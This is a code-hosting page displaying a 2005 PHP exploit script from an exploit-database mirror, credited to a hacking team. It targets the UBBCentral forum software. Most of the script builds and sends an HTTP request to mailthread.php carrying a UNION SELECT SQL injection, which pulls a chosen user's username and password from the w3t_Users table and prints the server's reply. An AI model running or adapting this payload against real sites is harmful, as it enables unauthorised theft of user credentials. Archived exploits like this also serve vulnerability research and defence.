PageRenderTime 51ms CodeModel.GetById 26ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/1069.php

https://bitbucket.org/DinoRex99/exploit-database
PHP | 49 lines | 13 code | 1 blank | 35 comment | 5 complexity | 2ac5d17d19d1ee291b87cb2a5e4ded4f MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. <?php

    2. 

  2. #############################################################################

    3. 

  3. #      T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m

    4. 

  4. #############################################################################

    5. 

  5. # Vulnerable:   UBBCentral SQL Injection

    6. 

  6. #

    7. 

  7. # Exploit By :  MH_p0rtal

    8. 

  8. #

    9. 

  9. # Discovered By: James Bercegay

    10. 

  10. #############################################################################

    11. 

  11. #  Gr33tz To ==>   Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke

    12. 

  12. #

    13. 

  13. #  And Iranian Hacking & Security Teams :

    14. 

  14. #  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,

    15. 

  15. #  Crouz Security Team  & Simorgh-ev Security Team

    16. 

  16. #############################################################################

    17. 

  17. # ___________Config :

    18. 

  18. # please replace your address :

    19. 

  19. $url = "http:///www.example.com";

    20. 

  20. # please replace your dir address :

    21. 

  21. $dirs = "/dir/to/ubbt/";

    22. 

  22. # __________End Config

    23. 

  23. #############################################################################

    24. 

  24. $aa = strlen ( $dirs );

    25. 

  25. $ab = $aa - 1;

    26. 

  26. $ac = 0;

    27. 

  27. if ((  $dirs[$ab] == "/" )  &&  ( $dirs[$ac] == "/" ))   {

    28. 

  28. $merg = $dirs.mailthread.php;

    29. 

  29. $fc = fsockopen("$url", 80, $errno, $errstr, 30);

    30. 

  30. if (!$fc) {

    31. 

  31. 

    32. 

  32. echo "Can't Connect\n";

    33. 

  33. } else {

    34. 

  34.    $mh = "GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat  HTTP/1.1\r\n";

    35. 

  35.    $mh .= "Host: $url\r\n";

    36. 

  36.    $mh .= "Connection: Close\r\n\r\n";

    37. 

  37. 

    38. 

  38.   fwrite($fc, $mh);

    39. 

  39.   while (!feof($fc)) {

    40. 

  40.   echo fgets($fc, 1024);

    41. 

  41.   }

    42. 

  42.    fclose($fc);

    43. 

  43. }

    44. 

  44. } else {

    45. 

  45. echo " Your pattern doesn't equal with Exploit directory pattern ";

    46. 

  46. }

    47. 

  47. ?>

    48. 

  48. 

    49. 

  49. # milw0rm.com [2005-06-25]
    50.